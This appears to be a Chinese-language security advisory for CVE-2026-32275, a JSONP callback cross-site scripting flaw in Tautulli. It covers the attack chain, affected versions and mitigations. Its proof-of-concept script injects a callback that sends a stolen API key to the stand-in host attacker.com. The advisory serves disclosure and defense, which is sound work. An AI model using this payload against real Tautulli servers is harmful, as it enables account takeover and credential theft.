IPBUF安全漏洞报告
English
CVE-2026-32275 CVSS 9.1 严重

CVE-2026-32275 Tautulli JSONP跨站脚本注入漏洞

披露日期: 2026-03-30
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-32275
漏洞类型
跨站脚本注入 (XSS)
CVSS评分
9.1 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Tautulli

相关标签

跨站脚本注入JSONP注入TautulliAPI密钥泄露远程代码执行

漏洞概述

Tautulli是一个基于Python的Plex Media Server监控工具。在1.3.10至2.17.0之前的版本中,由于未能正确清理JSONP回调参数,导致存在跨站脚本注入漏洞。攻击者可利用该漏洞注入恶意脚本,窃取用户的API密钥,进而对系统造成严重的安全威胁。该问题在2.17.0版本中已得到修复。

技术细节

该漏洞的根源在于Tautulli在处理JSONP请求时,未对用户提供的`callback`参数进行充分的校验和净化。JSONP机制允许通过`<script>`标签跨域获取数据,服务端会将数据包裹在回调函数中返回。攻击者可以利用这一特性,将`callback`参数构造为恶意的JavaScript代码(例如窃取Cookie或API Key的代码)。当受害者访问构造好的URL时,浏览器会解析并执行这段恶意脚本。由于脚本在目标域的上下文中执行,它能够绕过同源策略,读取本地存储的敏感信息,如Session Token或管理员API Key。随后,攻击者可以利用这些凭据接管账户,执行未授权操作,造成数据泄露或服务完整性破坏。

攻击链分析

STEP 1
侦察
攻击者发现目标使用的是存在漏洞的Tautulli版本(1.3.10至2.17.0之前)。
STEP 2
武器化
攻击者构造包含恶意JavaScript代码的JSONP回调参数,该代码旨在窃取API密钥或敏感数据。
STEP 3
交付
攻击者将构造好的恶意URL发送给目标管理员或用户,诱导其点击访问。
STEP 4
利用
当受害者访问链接时,浏览器解析Tautulli返回的响应,由于未过滤回调参数,恶意脚本在受害者浏览器中执行。
STEP 5
窃取与后门
恶意脚本读取当前上下文中的API密钥,并将其发送到攻击者控制的服务器,导致账户被接管。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// Proof of Concept for CVE-2026-32275 // Demonstrates JSONP callback injection to steal API keys // Malicious payload definition var maliciousCallback = 'function(data){ fetch(\'https://attacker.com/steal?c=\' + encodeURIComponent(JSON.stringify(data))); }'; // Construct the vulnerable URL with the unsanitized callback parameter // The target endpoint should be a JSONP-enabled API endpoint (e.g., get_api_key) var targetUrl = 'http://target-tautulli-instance/api/v2?cmd=get_api_key&callback=' + encodeURIComponent(maliciousCallback); // Simulate the victim visiting the link or script inclusion console.log("Attacker would send victim to:", targetUrl); // In a real attack, this would be injected via <script src="..."> var script = document.createElement('script'); script.src = targetUrl; document.body.appendChild(script);

影响范围

Tautulli 1.3.10 至 2.17.0 之前版本

防御指南

临时缓解措施
如果无法立即升级,建议在网络边界(如WAF或反向代理)上配置规则,拦截包含非法字符(如<, >, (, )等)的callback参数请求,并严格限制访问Tautulli管理界面的源IP地址。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表